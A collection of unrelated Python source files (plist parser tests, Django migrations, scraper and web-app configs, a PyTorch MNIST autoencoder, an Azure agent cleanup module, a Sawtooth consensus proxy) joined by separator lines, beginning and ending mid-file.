event_data.root = '/DeviceCache/44-00-00-00-00-00'
date_time = dfdatetime_posix_time.PosixTimeInMicroseconds(
timestamp=1351827808261762)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
class TestPlistPlugin(test_lib.PlistPluginTestCase):
"""Tests for the plist plugin interface."""
# pylint: disable=protected-access
def setUp(self):
"""Makes preparations before running an individual test."""
self._top_level_dict = {
'DeviceCache': {
'44-00-00-00-00-04': {
'Name': 'Apple Magic Trackpad 2', 'LMPSubversion': 796,
'Services': '', 'BatteryPercent': 0.61},
'44-00-00-00-00-02': {
'Name': 'test-macpro', 'ClockOffset': 28180,
'PageScanPeriod': 2, 'PageScanRepetitionMode': 1}}}
def testGetKeys(self):
"""Tests the _GetKeys function."""
# Ensure the plugin only processes if both filename and keys exist.
plugin = MockPlugin()
# Match DeviceCache from the root level.
key = ['DeviceCache']
result = plugin._GetKeys(self._top_level_dict, key)
self.assertEqual(len(result), 1)
# Look for a key nested a layer beneath DeviceCache from root level.
# Note: overriding the default depth to look deeper.
key = ['44-00-00-00-00-02']
result = plugin._GetKeys(self._top_level_dict, key, depth=2)
self.assertEqual(len(result), 1)
# Check the value of the result was extracted as expected.
self.assertEqual(result[key[0]]['Name'], 'test-macpro')
def testProcess(self):
"""Tests the Process function."""
# Ensure the plugin only processes if both filename and keys exist.
plugin = MockPlugin()
# Test correct filename and keys.
top_level = {'DeviceCache': 1, 'PairedDevices': 1}
storage_writer = self._ParsePlistWithPlugin(
plugin, 'plist_binary', top_level)
self.assertEqual(storage_writer.number_of_events, 1)
self.assertEqual(storage_writer.number_of_extraction_warnings, 0)
self.assertEqual(storage_writer.number_of_recovery_warnings, 0)
# Correct filename with odd filename cAsinG. Adding an extra useless key.
top_level = {'DeviceCache': 1, 'PairedDevices': 1, 'R@ndomExtraKey': 1}
storage_writer = self._ParsePlistWithPlugin(
plugin, 'pLiSt_BinAry', top_level)
self.assertEqual(storage_writer.number_of_events, 1)
self.assertEqual(storage_writer.number_of_extraction_warnings, 0)
self.assertEqual(storage_writer.number_of_recovery_warnings, 0)
def testRecurseKey(self):
"""Tests the _RecurseKey function."""
plugin = MockPlugin()
# Ensure with a depth of 1 we only return the root key.
result = list(plugin._RecurseKey(self._top_level_dict, depth=1))
self.assertEqual(len(result), 1)
# Trying again with depth limit of 2 this time.
result = list(plugin._RecurseKey(self._top_level_dict, depth=2))
self.assertEqual(len(result), 3)
# A depth of two should gives us root plus the two devices. Let's check.
my_keys = []
for unused_root, key, unused_value in result:
my_keys.append(key)
expected = {'DeviceCache', '44-00-00-00-00-04', '44-00-00-00-00-02'}
self.assertTrue(expected == set(my_keys))
if __name__ == '__main__':
unittest.main()
|
# Generated by Django 3.0.2 on 2020-11-26 04:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('puzzles', '0012_auto_20201111_0130'),
]
operations = [
migrations.AddField(
model_name='puzzle',
name='slack_channel_id',
field=models.CharField(default='', editable=False, max_length=30),
),
]
|
import argparse
parser = argparse.ArgumentParser(description="This program is a test of argparse.")
parser.add_argument('--number')
|
SECRET_KEY = 'dev'
SITES_DICT = {
'www.iie.cas.cn': 'xgs',
'www.is.cas.cn': 'rjs',
}
###############################################
MYSQL_HOST = 'localhost'
MYSQL_PORT = 6761
MYSQL_DB_NAME = 'crawling_db'
MYSQL_USER = 'root'
MYSQL_PASSWORD = 'mysql'
###############################################
SCRAPY_PATH = '../ScrapyBased/'
|
"""Send an X10 command."""
from ...constants import ResponseStatus, X10Commands, X10CommandType
from ...topics import X10_SEND
from ...x10_address import X10Address
from .. import ack_handler, nak_handler
from ..outbound_base import OutboundHandlerBase
class X10CommandSend(OutboundHandlerBase):
"""Send an X10 command."""
def __init__(self, address, x10_cmd: X10Commands):
"""Send an X10 command."""
super().__init__(topic=X10_SEND)
self._address = X10Address(address)
self._cmd = x10_cmd
# pylint: disable=arguments-differ
async def async_send(self):
"""Send the command."""
if self._cmd in [
X10Commands.ALL_LIGHTS_OFF,
X10Commands.ALL_LIGHTS_ON,
X10Commands.ALL_UNITS_OFF,
]:
cmd_int = int(self._cmd)
raw_x10 = (self._address.housecode_byte << 4) + cmd_int
return await super().async_send(
raw_x10=raw_x10, x10_flag=X10CommandType.COMMAND
)
raw_x10 = bytes(self._address)
uc_result = await super().async_send(
raw_x10=raw_x10, x10_flag=X10CommandType.UNITCODE
)
if uc_result != ResponseStatus.SUCCESS:
return uc_result
cmd_int = int(self._cmd)
raw_x10 = (self._address.housecode_byte << 4) + cmd_int
return await super().async_send(
raw_x10=raw_x10, x10_flag=X10CommandType.COMMAND
)
@ack_handler
def handle_ack(self, raw_x10, x10_flag):
"""Handle the X10 message ACK."""
super().handle_ack()
@nak_handler
def handle_nak(self, raw_x10, x10_flag):
"""Handle the X10 message NAK.
If the message NAKs it is likely the modem does not support X10 messages.
The device will try to send the X10 message 3 times to ensure it is not a
modem ready issue.
This handler ensures the modem does not try to resend the message constantly.
"""
|
import csv
with open('names.csv', 'r') as csv_file:
csv_reader = csv.reader(csv_file)
# to read contents of csv file as dictionary rather than list use this
# csv_reader = csv.DictReader(csv_file)
# csv_reader contains all an object which contains all data
# to see data of csv reader as list we can do this
# for line in csv_reader:
# print(line)
# to skip first line which contains field headers
# next(csv_reader)
with open('new_names.csv', 'w') as new_file:
csv_writer = csv.writer(new_file, delimiter='\t')
# follwing code can be used to write to csv files as dictionaries
# field_names = ['first_name','second_name','email']
# csv_writer=csv.DictWriter(new_file,fieldnames=field_names,delimiter="\t")
# to write field headers in csv file following line can be added
# csv_writer.writeheader()
for line in csv_reader:
csv_writer.writerow(line)
|
from functools import reduce
from operator import mul
from typing import Tuple
import torch
import torch.nn as nn
from models.base import BaseModule
from models.blocks_2d import DownsampleBlock
from models.blocks_2d import UpsampleBlock
from models.estimator import Estimator
from models.memory import MemModule
from itertools import chain
class Encoder(BaseModule):
"""
MNIST model encoder.
"""
def __init__(self, input_shape, code_length):
# type: (Tuple[int, int, int], int) -> None
"""
Class constructor:
:param input_shape: the shape of MNIST samples.
:param code_length: the dimensionality of latent vectors.
"""
super(Encoder, self).__init__()
self.input_shape = input_shape
self.code_length = code_length
c, h, w = input_shape
activation_fn = nn.LeakyReLU()
# Convolutional network
self.conv = nn.Sequential(
DownsampleBlock(channel_in=c, channel_out=32, activation_fn=activation_fn),
DownsampleBlock(channel_in=32, channel_out=64, activation_fn=activation_fn),
)
self.deepest_shape = (64, h // 4, w // 4)
# FC network
self.fc = nn.Sequential(
nn.Linear(in_features=reduce(mul, self.deepest_shape), out_features=64),
nn.BatchNorm1d(num_features=64),
activation_fn,
nn.Linear(in_features=64, out_features=code_length),
nn.Sigmoid()
)
def forward(self, x):
# types: (torch.Tensor) -> torch.Tensor
"""
Forward propagation.
:param x: the input batch of images.
:return: the batch of latent vectors.
"""
h = x
h = self.conv(h)
h = h.view(len(h), -1)
o = self.fc(h)
return o
class Decoder(BaseModule):
"""
MNIST model decoder.
"""
def __init__(self, code_length, deepest_shape, output_shape):
# type: (int, Tuple[int, int, int], Tuple[int, int, int]) -> None
"""
Class constructor.
:param code_length: the dimensionality of latent vectors.
:param deepest_shape: the dimensionality of the encoder's deepest convolutional map.
:param output_shape: the shape of MNIST samples.
"""
super(Decoder, self).__init__()
self.code_length = code_length
self.deepest_shape = deepest_shape
self.output_shape = output_shape
activation_fn = nn.LeakyReLU()
# FC network
self.fc = nn.Sequential(
nn.Linear(in_features=code_length, out_features=64),
nn.BatchNorm1d(num_features=64),
activation_fn,
nn.Linear(in_features=64, out_features=reduce(mul, deepest_shape)),
nn.BatchNorm1d(num_features=reduce(mul, deepest_shape)),
activation_fn
)
# Convolutional network
self.conv = nn.Sequential(
UpsampleBlock(channel_in=64, channel_out=32, activation_fn=activation_fn),
UpsampleBlock(channel_in=32, channel_out=16, activation_fn=activation_fn),
nn.Conv2d(in_channels=16, out_channels=1, kernel_size=1, bias=False)
)
def forward(self, x):
# types: (torch.Tensor) -> torch.Tensor
"""
Forward propagation.
:param x: the batch of latent vectors.
:return: the batch of reconstructions.
"""
h = x
h = self.fc(h)
h = h.view(len(h), *self.deepest_shape)
h = self.conv(h)
o = h
return o
class MEMMNIST(BaseModule):
"""
LSA model for MNIST one-class classification.
"""
def __init__(self, input_shape, code_length, cpd_channels, mem_dim, shrink_thres=0.0025):
# type: (Tuple[int, int, int], int, int) -> None
"""
Class constructor.
:param input_shape: the shape of MNIST samples.
:param code_length: the dimensionality of latent vectors.
:param cpd_channels: number of bins in which the multinomial works.
"""
super(MEMMNIST, self).__init__()
self.input_shape = input_shape
self.code_length = code_length
self.cpd_channels = cpd_channels
# Build encoder
self.encoder = Encoder(
input_shape=input_shape,
code_length=code_length
)
# Build decoder
self.decoder = Decoder(
code_length=code_length,
deepest_shape=self.encoder.deepest_shape,
output_shape=input_shape
)
# Build estimator
self.estimator = Estimator(
code_length=code_length,
fm_list=[32, 32, 32, 32],
cpd_channels=cpd_channels
)
self.mem_rep = MemModule(mem_dim=mem_dim, fea_dim=code_length, shrink_thres =shrink_thres)
def close_grad(self):
for param in self.encoder.parameters():
param.requires_grad = False
for param in self.estimator.parameters():
param.requires_grad = False
print("model need not grad")
def get_parameters(self):
return chain(self.decoder.parameters(), self.mem_rep.parameters())
def forward(self, x):
# type: (torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]
"""
Forward propagation.
:param x: the input batch of images.
:return: a tuple of torch.Tensors holding reconstructions, latent vectors and CPD estimates.
"""
h = x
# Produce representations
z = self.encoder(h)
# Estimate CPDs with autoregression
z_dist = self.estimator(z)
# B * C -> B*C*1*1
res_mem = self.mem_rep(z.view(z.size(0), z.size(1), 1, 1))
z_hat = res_mem['output']
att = res_mem['att']
z_hat = z_hat.view(z.size(0), z.size(1))
# Reconstruct x
x_r = self.decoder(z_hat)
x_r = x_r.view(-1, *self.input_shape)
return x_r, z, z_dist, att
|
from scrapper import *
# from process import *
import argparse
import json
def scrapPages(pages, keepTags=True):
with open("../data/sources.json", "r") as f:
visited = json.load(f)
visited_urls = [r["url"] for r in visited]
try:
with open("scrapped_data.json", "r") as json_file:
old_data = json.load(json_file)
except:
old_data = []
for pg in pages:
try:
if not (pg["url"] in visited_urls):
print("Starting to scrap", pg["url"])
data = scrap(pg["url"], testing=False, headless=True)
print("Finished scrapping page")
# quotes = process(data, names_list=pg["ppl"])
old_data += data
visited.append(pg)
else:
print("Already visited", pg["url"], ". Please call rescrap instead.")
except Exception as e:
print(e)
print("Omitting this url...")
with open("scrapped_data.json", "w+") as f:
json.dump(old_data, f, indent=4)
with open("../data/sources.json", "w+") as f:
json.dump(visited, f, indent=4)
def rescrap(pages, keepTags=True):
with open("../data/sources.json", "r") as f:
visited = json.load(f)
visited_urls = [r["url"] for r in visited]
for pg in pages:
if pg["url"] in visited_urls:
idx = visited_urls.index(pg["url"])
visited.pop(idx)
visited_urls.pop(idx)
with open("../data/sources.json", "w") as f:
json.dump(visited, f, indent=4)
with open("quotes.json", "r") as f:
quotes = json.load(f)
quotes = list(
filter(lambda q: not any(q["url"] == pg["url"] for pg in pages), quotes)
)
with open("quotes.json", "w") as f:
json.dump(quotes, f, indent=4)
scrapPages(pages, keepTags)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Scrap quotes from a tumblr page.")
parser.add_argument(
"path",
nargs=1,
help='path to json of list of quotes. The schema is\n...[{"url":...,"ppl":[...]}]\nThe ppl is list of characters\' names and can be empty.',
)
parser.add_argument(
"-t",
"--keepTags",
dest="keepTags",
action="store_true",
help="boolean to indicate whether you want to keep the tags of the original post (add this to set to True, add -np / --no-keepTags to set to False)",
)
parser.add_argument(
"-nt", "--no-keepTags", "--no-p", dest="keepTags", action="store_false"
)
parser.set_defaults(keepTags=True)
args = parser.parse_args()
print("arguments: " + str(args))
with open(args.path[0], "r") as f:
jsn = json.loads(f.read())
scrapPages(jsn, args.keepTags)
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common.event import add_event, WALAEventOperation
from azurelinuxagent.common.utils.restutil import KNOWN_WIRESERVER_IP
from azurelinuxagent.common.version import AGENT_NAME, CURRENT_VERSION
# Name for Metadata Server Protocol
_METADATA_PROTOCOL_NAME = "MetadataProtocol"
# MetadataServer Certificates for Cleanup
_LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME = "V2TransportPrivate.pem"
_LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME = "V2TransportCert.pem"
_LEGACY_METADATA_SERVER_P7B_FILE_NAME = "Certificates.p7b"
# MetadataServer Endpoint
_KNOWN_METADATASERVER_IP = "169.254.169.254"
def is_metadata_server_artifact_present():
metadata_artifact_path = os.path.join(conf.get_lib_dir(), _LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME)
return os.path.isfile(metadata_artifact_path)
def cleanup_metadata_server_artifacts(osutil):
logger.info("Clean up for MetadataServer to WireServer protocol migration: removing MetadataServer certificates and resetting firewall rules.")
_cleanup_metadata_protocol_certificates()
_reset_firewall_rules(osutil)
def _cleanup_metadata_protocol_certificates():
"""
Removes MetadataServer Certificates.
"""
lib_directory = conf.get_lib_dir()
_ensure_file_removed(lib_directory, _LEGACY_METADATA_SERVER_TRANSPORT_PRV_FILE_NAME)
_ensure_file_removed(lib_directory, _LEGACY_METADATA_SERVER_TRANSPORT_CERT_FILE_NAME)
_ensure_file_removed(lib_directory, _LEGACY_METADATA_SERVER_P7B_FILE_NAME)
def _reset_firewall_rules(osutil):
"""
Removes MetadataServer firewall rule so IMDS can be used. Enables
WireServer firewall rule based on if firewall is configured to be on.
"""
osutil.remove_firewall(dst_ip=_KNOWN_METADATASERVER_IP, uid=os.getuid(), wait=osutil.get_firewall_will_wait())
if conf.enable_firewall():
success, _ = osutil.enable_firewall(dst_ip=KNOWN_WIRESERVER_IP, uid=os.getuid())
add_event(
AGENT_NAME,
version=CURRENT_VERSION,
op=WALAEventOperation.Firewall,
is_success=success,
log_event=False)
def _ensure_file_removed(directory, file_name):
"""
Removes files if they are present.
"""
path = os.path.join(directory, file_name)
if os.path.isfile(path):
os.remove(path)
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
# BASIC APP CONFIG
WTF_CSRF_ENABLED = True
SECRET_KEY = 'changeme'
LOG_LEVEL = 'DEBUG'
LOG_FILE = 'logs/log.txt'
# TIMEOUT - for large zones
TIMEOUT = 10
# UPLOAD DIR
UPLOAD_DIR = os.path.join(basedir, 'upload')
# DATABASE CONFIG FOR MYSQL
DB_HOST = os.environ.get('PDA_DB_HOST')
DB_NAME = os.environ.get('PDA_DB_NAME')
DB_USER = os.environ.get('PDA_DB_USER')
DB_PASSWORD = os.environ.get('PDA_DB_PASSWORD')
#MySQL
SQLALCHEMY_DATABASE_URI = 'mysql://'+DB_USER+':'+DB_PASSWORD+'@'+DB_HOST+'/'+DB_NAME
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
SQLALCHEMY_TRACK_MODIFICATIONS = True
# SAML Authentication
SAML_ENABLED = False
SAML_DEBUG = True
SAML_PATH = os.path.join(os.path.dirname(__file__), 'saml')
##Example for ADFS Metadata-URL
SAML_METADATA_URL = 'https://<hostname>/FederationMetadata/2007-06/FederationMetadata.xml'
#Cache Lifetime in Seconds
SAML_METADATA_CACHE_LIFETIME = 1
# SAML SSO binding format to use
## Default: library default (urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect)
#SAML_IDP_SSO_BINDING = 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST'
## EntityID of the IdP to use. Only needed if more than one IdP is
## in the SAML_METADATA_URL
### Default: First (only) IdP in the SAML_METADATA_URL
### Example: https://idp.example.edu/idp
#SAML_IDP_ENTITY_ID = 'https://idp.example.edu/idp'
## NameID format to request
### Default: The SAML NameID Format in the metadata if present,
### otherwise urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified
### Example: urn:oid:0.9.2342.19200300.100.1.1
#SAML_NAMEID_FORMAT = 'urn:oid:0.9.2342.19200300.100.1.1'
## Attribute to use for Email address
### Default: email
### Example: urn:oid:0.9.2342.19200300.100.1.3
#SAML_ATTRIBUTE_EMAIL = 'urn:oid:0.9.2342.19200300.100.1.3'
## Attribute to use for Given name
### Default: givenname
### Example: urn:oid:2.5.4.42
#SAML_ATTRIBUTE_GIVENNAME = 'urn:oid:2.5.4.42'
## Attribute to use for Surname
### Default: surname
### Example: urn:oid:2.5.4.4
#SAML_ATTRIBUTE_SURNAME = 'urn:oid:2.5.4.4'
## Attribute to use for username
### Default: Use NameID instead
### Example: urn:oid:0.9.2342.19200300.100.1.1
#SAML_ATTRIBUTE_USERNAME = 'urn:oid:0.9.2342.19200300.100.1.1'
## Attribute to get admin status from
### Default: Don't control admin with SAML attribute
### Example: https://example.edu/pdns-admin
### If set, look for the value 'true' to set a user as an administrator
### If not included in assertion, or set to something other than 'true',
### the user is set as a non-administrator user.
#SAML_ATTRIBUTE_ADMIN = 'https://example.edu/pdns-admin'
## Attribute to get account names from
### Default: Don't control accounts with SAML attribute
### If set, the user will be added and removed from accounts to match
### what's in the login assertion. Accounts that don't exist will
### be created and the user added to them.
SAML_ATTRIBUTE_ACCOUNT = 'https://example.edu/pdns-account'
SAML_SP_ENTITY_ID = 'http://<SAML SP Entity ID>'
SAML_SP_CONTACT_NAME = '<contact name>'
SAML_SP_CONTACT_MAIL = '<contact mail>'
#Configures if SAML tokens should be encrypted.
#If enabled a new app certificate will be generated on restart
SAML_SIGN_REQUEST = False
#Use SAML standard logout mechanism retrieved from idp metadata
#If configured false don't care about SAML session on logout.
#Logout from PowerDNS-Admin only and keep SAML session authenticated.
SAML_LOGOUT = False
#Configure to redirect to a different url then PowerDNS-Admin login after SAML logout
#for example redirect to google.com after successful saml logout
#SAML_LOGOUT_URL = 'https://google.com'
|
import unittest
from nemex import Entity
class TestEntity(unittest.TestCase):
def setUp(self) -> None:
# TODO: Setup test.
self.entity = Entity(0, "")
return None
def test_example(self):
return self.assertEqual("", "")
def tearDown(self) -> None:
return None
if __name__ == '__main__':
unittest.main()
|
class Provider:
"""Superclass for provider plugins"""
DEFAULT_OP_ARGS = {}
@classmethod
def get_default_op_args(cls, processor):
return cls.DEFAULT_OP_ARGS.get(processor, dict())
class TinkerGraph(Provider): # TODO
"""Default provider"""
@staticmethod
def get_hashable_id(val):
return val
|
def brightnessApp(display, utime, ujson, bluetooth, startNewThread, playBuzzer, loadJSON, saveJSON, showControls, update, clear):
run = True
settings = loadJSON("settings.json")
display.set_backlight(settings["brightness"])
displayBrightness = int(settings["brightness"] * 10)
while run:
clear()
#Draw the app
showControls(display.get_width(), display.get_height(), "", "<-", "+", "-")
display.text("Helderheid: " + str(displayBrightness), 20 , 60, 500, 3)
#App Controls
buttonPressed = False
while display.is_pressed(display.BUTTON_X):
if not buttonPressed and displayBrightness < 10:
startNewThread(playBuzzer)
displayBrightness += 1
display.set_backlight(displayBrightness/10)
settings["brightness"] = displayBrightness/10
buttonPressed = True
while display.is_pressed(display.BUTTON_Y):
if not buttonPressed and displayBrightness > 1:
startNewThread(playBuzzer)
displayBrightness -= 1
display.set_backlight(displayBrightness/10)
settings["brightness"] = displayBrightness/10
buttonPressed = True
while display.is_pressed(display.BUTTON_A):
pass
while display.is_pressed(display.BUTTON_B):
if not buttonPressed and displayBrightness > 1:
startNewThread(playBuzzer)
run = False
saveJSON("settings.json", settings)
buttonPressed = True
buttonPressed = False
update()
|
# 15/06/2017
import re
def condense(str):
return re.sub(r"(\w+)\s\1", r"\1", str)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-02-19 03:07
from __future__ import unicode_literals
from django.db import migrations
from usaspending_api.common.helpers.generic_helper import CORRECTED_CGAC_PG_FUNCTION_DEF
from usaspending_api.common.helpers.generic_helper import REV_CORRECTED_CGAC_PG_FUNCTION_DEF
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.RunSQL(sql=CORRECTED_CGAC_PG_FUNCTION_DEF,
reverse_sql=REV_CORRECTED_CGAC_PG_FUNCTION_DEF),
]
|
# Copyright 2019 NTRLab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
# pylint: disable=inconsistent-return-statements
import time
import random
import hashlib
import logging
from sawtooth_validator.journal.block_wrapper import BlockWrapper
from sawtooth_validator.journal.consensus.consensus \
import BlockPublisherInterface
from sawtooth_validator.journal.consensus.consensus \
import BlockVerifierInterface
from sawtooth_validator.journal.consensus.consensus \
import ForkResolverInterface
from sawtooth_validator.state.settings_view import SettingsView
# for proxy engine
from threading import Condition
LOGGER = logging.getLogger(__name__)
_CONSENSUS_NAME_ = None
_consensus_notifier = None
class BlockPublisher(BlockPublisherInterface):
"""DevMode consensus uses genesis utility to configure Min/MaxWaitTime
to determine when to claim a block.
Default MinWaitTime to zero and MaxWaitTime is 0 or unset,
ValidBlockPublishers default to None or an empty list.
DevMode Consensus (BlockPublisher) will read these settings
from the StateView when Constructed.
"""
def __init__(self,
block_cache,
state_view_factory,
batch_publisher,
data_dir,
config_dir,
validator_id):
super().__init__(
block_cache,
state_view_factory,
batch_publisher,
data_dir,
config_dir,
validator_id)
self._block_cache = block_cache
self._state_view_factory = state_view_factory
self._start_time = 0
self._wait_time = 0
# Set these to default values right now, when we asked to initialize
# a block, we will go ahead and check real configuration
self._min_wait_time = 0.01
self._max_wait_time = 0.06
self._valid_block_publishers = None # list of validator which can participate into consensus
self._consensus = None
self._condition = Condition()
self._is_finalize_complete = None
def set_consensus_name(self,name):
self._consensus = bytes(name, 'utf-8')
LOGGER.debug("PROXY:set_consensus_name=%s->%s",name,self._consensus)
def set_publisher(self,publisher):
self._publisher = publisher
LOGGER.debug("PROXY:set_publisher=%s",publisher)
def initialize_block(self, block_header):
"""Do initialization necessary for the consensus to claim a block,
this may include initiating voting activates, starting proof of work
hash generation, or create a PoET wait timer.
Args:
block_header (BlockHeader): the BlockHeader to initialize.
Returns:
True
"""
if not self._consensus:
LOGGER.debug("initialize_block: external consensus not regitered\n")
return False
# Using the current chain head, we need to create a state view so we
# can get our config values.
state_view = BlockWrapper.state_view_for_block(
self._block_cache.block_store.chain_head,
self._state_view_factory)
settings_view = SettingsView(state_view)
self._min_wait_time = settings_view.get_setting("bgx.consensus.min_wait_time", self._min_wait_time, float)
self._max_wait_time = settings_view.get_setting("bgx.consensus.max_wait_time", self._max_wait_time, float)
self._valid_block_publishers = settings_view.get_setting("bgx.consensus.valid_block_publishers",self._valid_block_publishers,list)
block_header.consensus = self._consensus # b"Devmode"
self._start_time = time.time()
self._wait_time = random.uniform(self._min_wait_time, self._max_wait_time)
LOGGER.debug("PROXY:initialize_block min_wait_time=%s max_wait_time=%s",self._min_wait_time,self._max_wait_time)
return True
def check_publish_block(self, block_header):
"""
Check if a candidate block is ready to be claimed.
For many peers we should control block's content .
If this peer is not owner of batch we must wait until all batches which were putted into block for peer owner of batch
will be putted into block for this peer too.
block_header (BlockHeader): the block_header to be checked if it
should be claimed
Returns:
Boolean: True if the candidate block_header should be claimed.
"""
if self._valid_block_publishers and block_header.signer_public_key not in self._valid_block_publishers:
return False
elif self._min_wait_time == 0:
return True
elif self._min_wait_time > 0 and self._max_wait_time <= 0:
if self._start_time + self._min_wait_time <= time.time():
return True
elif self._min_wait_time > 0 and self._max_wait_time > self._min_wait_time:
if self._start_time + self._wait_time <= time.time():
return True
else:
return False
def finalize_block_complete(self,consensus):
with self._condition:
self._is_finalize_complete = consensus
self._condition.notify()
def _finalize_complete(self):
return self._is_finalize_complete is not None
def finalize_block(self, block_header):
"""Finalize a block to be claimed. Provide any signatures and
data updates that need to be applied to the block before it is
signed and broadcast to the network.
Args:
block_header (BlockHeader): The candidate block that needs to be
finalized.
Returns:
True
"""
LOGGER.debug("PROXY:finalize_block inform external engine header=%s is_complete=%s",block_header.block_num,self._is_finalize_complete)
self._publisher.on_finalize_block(block_header)
self._is_finalize_complete = None
"""
after that consensus engine should be informed that block could be finalized and engine can say finalize for this candidate
FIXME - for DAG we can say for all ready candidate that his block's could be finalized and only after that wait engine's reply
"""
LOGGER.debug("PROXY:finalize_block wait proxy reply via finalize_block_complete...\n")
with self._condition:
return self._condition.wait_for(self._finalize_complete)
return True
class BlockVerifier(BlockVerifierInterface):
"""PROXY BlockVerifier implementation
"""
# pylint: disable=useless-super-delegation
def __init__(self,
block_cache,
state_view_factory,
data_dir,
config_dir,
validator_id):
super().__init__(
block_cache,
state_view_factory,
data_dir,
config_dir,
validator_id)
self._consensus = bytes(_CONSENSUS_NAME_, 'utf-8')
self._condition = Condition()
def verify_block_invalid(self,blkw):
# send message to external consensus
blk = blkw.get_block()
LOGGER.debug("PROXY:verify_block_invalid blk=%s\n",blk.header_signature[:8])
_consensus_notifier.notify_block_invalid(blk.header_signature)
def verify_block_complete(self,verify):
LOGGER.debug("PROXY:verify_block_complete %s",verify)
with self._condition:
self._is_verify_complete = verify
self._condition.notify()
def _verify_complete(self):
return self._is_verify_complete is not None
def verify_block(self, block_wrapper):
LOGGER.debug("PROXY:verify_block %s",self._consensus)
# send message new block
self._is_verify_complete = None
_consensus_notifier.notify_block_new(block_wrapper.get_block())
LOGGER.debug("PROXY:verify_block waiting consensus reply for BLOCK=%s.%s\n",block_wrapper.block_num,block_wrapper.identifier[:8])
with self._condition:
if self._condition.wait_for(self._verify_complete):
return self._is_verify_complete
return block_wrapper.header.consensus == self._consensus
class ForkResolver(ForkResolverInterface):
"""Provides the fork resolution interface for the BlockValidator to use
when deciding between 2 forks.
"""
# pylint: disable=useless-super-delegation
def __init__(self,
block_cache,
state_view_factory,
data_dir,
config_dir,
validator_id):
super().__init__(
block_cache,
state_view_factory,
data_dir,
config_dir,
validator_id)
self._consensus = bytes(_CONSENSUS_NAME_, 'utf-8')
self._condition = Condition()
@staticmethod
def hash_signer_public_key(signer_public_key, header_signature):
m = hashlib.sha256()
m.update(signer_public_key.encode())
m.update(header_signature.encode())
digest = m.hexdigest()
number = int(digest, 16)
return number
def _compare_forks_complete(self):
return self._is_compare_forks is not None
def compare_forks_complete(self,result):
LOGGER.debug("PROXY:compare_forks_complete result=%s",result)
with self._condition:
self._is_compare_forks = result
self._condition.notify()
def compare_forks(self, cur_fork_head, new_fork_head):
"""The longest chain is selected. If they are equal, then the hash
value of the previous block id and publisher signature is computed.
The lowest result value is the winning block.
Args:
cur_fork_head: The current head of the block chain.
new_fork_head: The head of the fork that is being evaluated.
Returns:
bool: True if choosing the new chain head, False if choosing
the current chain head.
"""
LOGGER.debug("PROXY:compare_forks cur~new=%s~%s new fork consensus=%s~%s",cur_fork_head.identifier[:8],new_fork_head.identifier[:8],new_fork_head.consensus,self._consensus)
# If the new fork head is not DevMode consensus, bail out. This should
# never happen, but we need to protect against it.
if new_fork_head.consensus != self._consensus and new_fork_head.consensus != b"Genesis":
raise TypeError('New fork head {} is not a {} block'.format(new_fork_head.identifier[:8],_CONSENSUS_NAME_))
self._is_compare_forks = None
_consensus_notifier.notify_block_valid(new_fork_head.identifier)
LOGGER.debug("PROXY:compare_forks waiting consensus reply for new head=%s\n",new_fork_head.identifier[:8])
with self._condition:
if self._condition.wait_for(self._compare_forks_complete) :
if self._is_compare_forks:
# send message to external consensus
_consensus_notifier.notify_block_commit(new_fork_head.identifier)
return self._is_compare_forks
# If the current fork head is not DevMode consensus, check the new fork
# head to see if its immediate predecessor is the current fork head. If
# so that means that consensus mode is changing. If not, we are again
# in a situation that should never happen, but we need to guard
# against.
"""
if cur_fork_head.consensus != self._consensus:
if new_fork_head.previous_block_id == cur_fork_head.identifier:
LOGGER.info('Choose new fork {}: New fork head switches consensus to {}'.format(new_fork_head.identifier[:8],_CONSENSUS_NAME_))
return True
raise \
TypeError(
'Trying to compare a {} block {} to a non-{} '
'block {} that is not the direct predecessor'.format(
_CONSENSUS_NAME_,
new_fork_head.identifier[:8],
_CONSENSUS_NAME_,
cur_fork_head.identifier[:8]))
if new_fork_head.block_num == cur_fork_head.block_num:
cur_fork_hash = self.hash_signer_public_key(
cur_fork_head.header.signer_public_key,
cur_fork_head.header.previous_block_id)
new_fork_hash = self.hash_signer_public_key(
new_fork_head.header.signer_public_key,
new_fork_head.header.previous_block_id)
result = new_fork_hash < cur_fork_hash
else:
result = new_fork_head.block_num > cur_fork_head.block_num
return result
"""
|
# File: lawnmower.py
# from chapter 15 of _Genetic Algorithms with Python_
#
# Author: Clinton Sheppard <fluentcoder@gmail.com>
# Copyright (c) 2016 Clinton Sheppard
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
